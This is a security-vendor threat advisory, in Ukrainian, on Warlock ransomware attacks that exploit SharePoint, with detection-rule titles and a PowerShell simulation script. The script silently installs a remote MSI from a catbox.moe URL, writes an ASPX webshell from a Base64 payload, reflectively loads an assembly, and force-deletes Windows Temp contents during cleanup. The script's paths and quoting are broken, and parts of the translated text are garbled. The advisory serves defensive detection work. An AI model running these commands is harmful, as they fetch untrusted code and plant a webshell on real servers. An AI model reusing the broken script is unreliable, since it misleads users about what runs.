SOC Prime Bias: Critical

05 Oct 2026 17:09 UTC

Атаки з використанням програм-вимагачів Warlock на критично важливу водну та телекомунікаційну інфраструктуру

Author Photo
SOC Prime Team linkedin icon Стежити
Атаки з використанням програм-вимагачів Warlock на критично важливу водну та телекомунікаційну інфраструктуру
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Загроза з Китаю, відома як Longlegs, використовує вразливості Microsoft SharePoint для розгортання програм-здирників Warlock. Група використовує ланцюг експлойтів ToolShell для початкового доступу, а потім переміщується стороною по скомпрометованих мережах. Зловмисники також застосовують передові методи ухилення, зокрема використовуючи вразливі драйвери для відключення програм безпеки і легітимні хмарні сервіси для доставки шкідливого ПЗ.

Розслідування

Розслідування простежило активність від початкової експлуатації SharePoint до розгортання вебшелла в каталозі LAYOUTS. Аналітики спостерігали за використанням підроблених ключів машини ASP.NET для віддаленого виконання коду та зберігання програм-здирників у спільному доступі SYSVOL для поширення по всьому домену. Ланцюг атаки також включав завантаження DLL та неправильне використання можливостей тунелювання Visual Studio Code для стійкого доступу.

Захист

Організації слід надавати пріоритет у виправленні серверів Microsoft SharePoint для усунення відомих вразливостей ToolShell. Впровадження строгих контролів над підписаними, але вразливими драйверами може допомогти запобігти атакам BYOVD. Команди з безпеки також повинні стежити за аномальним використанням інструментів living-off-the-land та обмежувати доступ до спільного доступу SYSVOL для попередження небезпечної активності, щоб зменшити бічний рух і розгортання програм-здирників.

Відповідь

Коли виявляється шкідлива активність, співробітники з інцидентів повинні ізолювати уражені сервери SharePoint та перевірити SYSVOL спільний доступ на незареєстровані скрипти або бінарні файли. Проведіть комплексний аудит облікових записів у домені, зосереджуючись на незареєстрованих доповненнях до локальної групи адміністраторів. Перевірте мережевий трафік на наявність вихідних з’єднань із сервісами обміну файлами, такими як catbox.moe або wasabisys.com, які використовуються для зберігання шкідливого ПЗ.

Процес атаки

Виявлення

Додано користувача до локальних адміністраторів (через cmdline)

Команда SOC Prime
05 жовтня 2026

Завантаження або завантаження через Powershell (через cmdline)

Команда SOC Prime
05 жовтня 2026

Підозрілі рядки в Powershell (через cmdline)

Команда SOC Prime
05 жовтня 2026

Виклик підозрілих класів/методів .NET з командного рядка Powershell (через process_creation)

Команда SOC Prime
05 жовтня 2026

Можливе виявлення спільного доступу до мережі (через cmdline)

Команда SOC Prime
05 жовтня 2026

Виявлення підозрілих доменних довіреностей (через cmdline)

Команда SOC Prime
05 жовтня 2026

Можлива спроба встановлення віддаленого MSI файлу (через cmdline)

Команда SOC Prime
05 жовтня 2026

Підозріле виконання з громадського профілю користувача (через process_creation)

Команда SOC Prime
05 жовтня 2026

Підозрілі рядки в Powershell (через powershell)

Команда SOC Prime
05 жовтня 2026

Виклик підозрілих методів .NET з Powershell (через powershell)

Команда SOC Prime
05 жовтня 2026

Можливе створення вебшелла в каталогах Microsoft Exchange / Sharepoint (через file_event)

Команда SOC Prime
05 жовтня 2026

Підозрілі файли в громадському профілі користувача (через file_event)

Команда SOC Prime
05 жовтня 2026

Можливе проникнення/виведення даних/управління C2 через сторонні сервіси/інструменти (через proxy)

Команда SOC Prime
05 жовтня 2026

Можливе проникнення/виведення даних/управління C2 через сторонні сервіси/інструменти (через dns)

Команда SOC Prime
05 жовтня 2026

Підозрілі команди та управління за запитом до домену Out-of-Band взаємодій (через dns)

Команда SOC Prime
05 жовтня 2026

IOC (HashSha256) для виявлення: Зловмисники програми-здирника Warlock б’ють по операторах води та телекомунікацій

Правила SOC Prime AI
05 жовтня 2026

Виявлення шкідливої команди PowerShell для виконання коду [Windows Powershell]

Правила SOC Prime AI
05 жовтня 2026

Інсценування і виконання програми-здирника Warlock через спільний доступ до мережі [Windows File Event]

Правила SOC Prime AI
05 жовтня 2026

Індикатори програми-здирника Warlock на серверах SharePoint [Windows Process Creation]

Правила SOC Prime AI
05 жовтня 2026

Імітація виконання

Передумова: Перевірка телеметрії та базової конфігурації повинна бути пройдена.

Обґрунтування: У цьому розділі детально описується точне виконання техніки супротивника (TTP) для активації правила виявлення. Команди та наратив МАЮТЬ прямо відображати ідентифіковані TTP та мають на меті генерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або нерелевантні приклади призведуть до неправильного діагнозу.

  • Наратив атаки та команди: Супротивник прагне розгорнути програму-здирник Warlock на сервері SharePoint. Атака починається з використання msiexec для завантаження шкідливого MSI з віддаленого домену, контрольованого атакуючим (catbox.moe). Після початкової фили греблі, зловмисник використовує PowerShell для запису шкідливого ASPX вебшелла в SharePoint layout2sp.aspx шлях із використанням Base64 закодованого навантаження, щоб обійти прості текстові фільтри. Нарешті, нападник намагається завантажити шкідливу .NET збірку безпосередньо в пам’ять за допомогою System.Workflow.ComponentModel для виконання коду без залишення слідів файлу на диску.

  • Скрипт регресійного тестування:

    # Скрипт симуляції програми-здирника Warlock
    # ПРИМІТКА: Цей скрипт призначений лише для авторизованих тестових цілей.
    
    Write-Host "[!] Запуск симуляції програми-здирника Warlock..." -ForegroundColor Red
    
    # 1. Симулюйте MSIEXEC віддалене завантаження (Вибір 3)
    Write-Host "[*] Симулюю віддалене завантаження MSIEXEC..."
    Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue
    
    # 2. Симулюйте PowerShell ASPX вебшелл падіння (Вибір 1)
    # Ми використовуємо точний рядок з правила для забезпечення виявлення
    Write-Host "[*] Симулюю PowerShell вебшелл падіння через Base64..."
    $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))"""
    Invoke-Expression $cmd1
    
    # 3. Симулюйте відображене завантаження збірки (Вибір 2)
    Write-Host "[*] Симулюю відображене завантаження збірки..."
    $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel"
    Invoke-Expression $cmd2
    
    Write-Host "[+] Команди симуляції передані." -ForegroundColor Green
  • Команди очищення:

    # Скрипт очищення для видалення артефактів, створених під час симуляції
    Write-Host "[!] Очищення артефактів симуляції..." -ForegroundColor Yellow
    
    # Видаліть змодельовані файли (Примітка: У реальному тесті ви б націлилися на конкретні шляхи, створені)
    # Оскільки ми використовували фіктивні рядки, ми в основному переконуємося, що жодні справжні шкідливі файли не були скинуті.
    Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "[+] Очищення завершено." -ForegroundColor Green